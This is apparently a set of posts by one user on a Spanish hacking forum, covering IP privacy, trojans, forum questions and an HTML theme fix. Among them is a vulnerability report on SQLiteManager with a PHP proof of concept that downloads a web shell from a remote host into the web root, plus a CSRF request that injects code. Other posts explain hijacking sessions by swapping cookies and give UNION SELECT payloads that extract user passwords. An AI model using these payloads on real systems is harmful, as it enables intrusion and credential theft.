Mensajes

El de actualizar este foro no está en mis manos, no tengo acceso a esas cosas. de todas formas el-brujo ya debe saber.

Los que tienen acceso a tu ip son:

Coadministradores
Administrador
Tu proveedor de ISP
Haz un cmd /c tracert elhacker.net y te aparecerá una lista de servidores que tienen tu ip mas todo el que se le ocurra sniffear o loggear tráfico
Si usas windows entonces también lo sabe el servidor de actualizaciones de Microsoft
Si usas gnu/linux entonces lo sabe el administrador del servidor de repositorios synaptic
El administrador fisico de este servidor también lo sabe
Todos los administradores de los sitios webs donde navegas tienen tu ip.

Mira -->

Ahora imageshack también tiene tu ip.

Ahora si me preguntas como te subieron un troyano te puedo asegurar que hay menos de un 15% de probabilidades de que haya sido atraves de tu ip.
Nunca aceptes cosas sin saber o verifica que cosas estas ejecutando.
Si ejecutas software privativo de código cerrado entonces tu troyano pudo haber venido de cualquier otro software como regalito al igual que lo hacía antiguamente el mensajero de yahoo 5 con su malware que te modificaba el fondo de escritorio por un logo de yahoo y no lo podías quitar a la buena o el studio .net de microsoft cuando te instala un componente en firefox y no te deja desintalarlo a la buena.
Hay veces en que los antispywares traen malwares y se ha comprobado como por ejemplo con el terminator.

ejecute el comando netstat --v -b solo aparecia conectado con este sitio y con un servidor en suecia que al parecer era traddedoublerclick.com

Muchisimos sitios usan ese servidor para moneyclicks incluyendo yahoo y msn.

No se todavía si quieras saber quien tiene tu ip o quien te troyó.

En ese caso ya no se podría decir que "el staff los borró"

No puedes eliminar tus post pero si quieres dejar de entrar puedes desactivar tu cuenta (aunque se puede volver a activar igual).

No creo que te lo puedan borrar tampoco a menos que haya una muy buena razón.
Además, puedes ser alguien que tomó la pc de ese usuario y entra logueado, quien sabe.

[Remote Execution]

Bueno, encontré multiples vulnerabilidades en Sqliteadmin las cuales son las siguientes:


Remote Execution
Hay ejecución remota cuando vas a la sección de bases de datos y le haces click en cualqueir función, entonces editas una función y al guardarla ya se estará ejecutando el código automáticamente:

Conversado con una persona me decía que esto no es arbitrario ya que el sistema deja por defecto crear funciones, pero .... normalmente no debería ejecutarse todo código que se escriba, normalmente debería quedar encerrado en una clase publica de forma que si hay una ejecución forzada no debería ejecutarse hasta que la función realmente sea llamada o necesitada y no cargar todo en memoria como se hace actualmente dejando desprotegido el sistema, a mucho debería tener un input para dictar el nombre de la función y un filtro que verifique que todas las llaves están correctamente cerradas para evitar el escape hacia fuera de la función.
Debería?... nop, no debería.

PoC:

Código (php) [Seleccionar] Expandir

$shell = file_get_contents('http://host/mi_shell_aca');
$out = 'c:\\wamp\\www\\x.php';
if(file_exists($out)) unlink($out);
$h = fopen($out, 'x');
fwrite($h, $shell);
fclose($h);

Fijarse que en win los slash son dobles "\\" porque uno solo es escape de carácter, es como decir "^<" en batch.


CSRF

http://censurado/sqlitemanager/main.php?dbsel=1
POST /sqlitemanager/main.php?dbsel=1 HTTP/1.1
Host: requetecensurado :p
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3,
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://censurado/sqlitemanager/main.php?dbsel=1&function=IF&action=modify
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 332
FunctName=IF&FunctType=1&FunctCode=echo+%27test%27%3B%0D%0Afunction+sqliteIf%28%24compare%2C+%24good%2C+%24bad%29%7B%0D%0A++++if+%28%24compare%29+%7B%0D%0A++++++++return+%24good%3B%0D%0A++++%7D+else+%7B+%0D%0A++++++++return+%24bad%3B%0D%0A++++%7D%0D%0A%7D&FunctFinalCode=&FunctNumArgs=3&FunctAttribAll=1&function=IF&id=1&action=save

No hay un token de verificación ni nada que impida la ejecución arbitraria de lo que al atacante se le antoje.


Path Disclosure
Puedes dar una ejecución arbitraria con error forzado y te arrojará un path disclosure:

La solución sería nunca mostrar error_reporting(E_ALL) en un sistema publicado.


Falta de Autificación
Como no hay un login de autentificación por defecto en este sistema pasa lo que pasa.


Consecuencias



Recomendaciones

Poner en un lugar mas inaccesible este sistema para que no pueda ser manipulado de forma externa y agregarle un login de seguridad como por ejemplo un auth de apache con htaccess.


Saludos.

Yo pienso que un post orientado a la seguridad forence puede postearse en el logar que le corresponda ya sea en hacking avanzado o de win o bugs y exploits, para mi eso sería repetir foros ya que cualquier tema puedes transformarlo en forence ya que al final es practicamente el mismo tipo de conocimiento solo que enfocado a lo legal.

Sería como hacer un foro para cracking y otro para ingeniería inversa.

muchas cosas, ver accesos hacia la base de datos si es que tiene, ver los parámetros por defecto de muchas cosas que te pueden ayudar a hacer cosas como por ejemplo si activa magic quotes o no para ver de que manera puedo hacer una inyeción sql, etc.

Cada sistema cms es diferente al igual que cada configuración y servidor.

es como si dijeras que tienes un zapato y preguntas a quien le calza sin saber el numero o color

entra como un usuario normal y cheka tus cookies, reemplaza tu pass normal por el pass del otro usuario, no necesitas crackear nada..
por ejemplo si tu cookie es:

id:1:pass:hgfdf5465df465df4g86f

entonces sacas los datos de la otra persona y reemplazas tus datos por los de el y ya, refrescas el navegador y ya tomaste poder de su sesión.

union select 1,2,3,4,usuario,clave,7,8,9,0 from basededatos.usuarios /*
donde basededatos es el nombre de la base de datos que sacas con
union select 1,2,3,4,database(),6,7,8,9,0 /*

Si te limita a una sola columna le vas dando limit 1 y vas seleccionando user por user

Extraño pero también me aparece el mismo error, se me desencaja la web con este theme... lo abrí con el firebug y comenzé a experimentar y me dic uenta que hay un formulario con el id "postmodify" y dentro vienen dos tablas... la primera tabla se desencaja y la segunda se ve bién as que si elimino la primera tabla que no tiene "id" desde el firebug ahora se me desencaja la división que viene "class=bordercolor" asi que como solución puse una tabla en balnco al comienzo y después las demás tablas con contenido y ahi se arregla :p... o sea, normalmente se ve así:

Código (html4strict) [Seleccionar] Expandir

[pre]<form action="https://foro.elhacker.net/post2.html;start=0;board=10" method="post" accept-charset="ISO-8859-1" name="postmodify" id="postmodify" onsubmit="submitonce(this);saveEntities();" enctype="multipart/form-data" style="margin: 0;">
<table width="100%" align="center" cellpadding="0" cellspacing="3">
[/pre][pre] <tr>
<td valign="bottom" colspan="2">
<span class="pathway"><a href="https://foro.elhacker.net/index.php" class="pathway">Foro de elhacker.net</a><font size="1"> &raquo; </font> <a href="https://foro.elhacker.net/index.php#1" class="pathway">Forums Generales</a><font size="1"> &raquo; </font> <a href="https://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro-b10.0/" class="pathway">Sugerencias y dudas sobre el Foro</a><font size="1"> &raquo; </font> <span><b class="nav">Responder al mensaje ( </b></span>Re: Error del foro o firefox?<span><b class="nav"> )</b></span> </span>
[/pre][pre] </td>
</tr>
</table>
<div id="preview_section" style="display: none;">
[/pre]

Lo cambias por esto:

Código (html4strict) [Seleccionar] Expandir

[pre]<form action="https://foro.elhacker.net/post2.html;start=0;board=10" method="post" accept-charset="ISO-8859-1" name="postmodify" id="postmodify" onsubmit="submitonce(this);saveEntities();" enctype="multipart/form-data" style="margin: 0;">
<table></table>
<table width="100%" align="center" cellpadding="0" cellspacing="3">
[/pre][pre] <tr>
<td valign="bottom" colspan="2">
<span class="pathway"><a href="https://foro.elhacker.net/index.php" class="pathway">Foro de elhacker.net</a><font size="1"> &raquo; </font> <a href="https://foro.elhacker.net/index.php#1" class="pathway">Forums Generales</a><font size="1"> &raquo; </font> <a href="https://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro-b10.0/" class="pathway">Sugerencias y dudas sobre el Foro</a><font size="1"> &raquo; </font> <span><b class="nav">Responder al mensaje ( </b></span>Re: Error del foro o firefox?<span><b class="nav"> )</b></span> </span>
[/pre][pre] </td>
</tr>
</table>
<div id="preview_section" style="display: none;">
[/pre]

Y asunto arreglado.

Igual la consola de errores del firefox me lanza tres errores que son problemas de nombres de variables y en validator.w3 me da como 150 errores mas (http://validator.w3.org/check?uri=http%3A%2F%2Fforo.elhacker.net%2Findex.php&charset=%28detect+automatically%29&doctype=Inline&group=0&user-agent=W3C_Validator%2F1.654) debido a que en el header se declara html4 y no xhtml como está realmente programado ya que por ejemplo al hacer <img src="" /> es xhtml, si fuera html4 debería ser <img src=""></img>, etc etc.. nakp saber mas del tema.

PD: ahora me cambio nuevamente al theme clásico azul xD
PD2: al hacer click en las caras no se coloca en el formulario

Deprecated method document.getSelection() called. Please use window.getSelection() instead.

.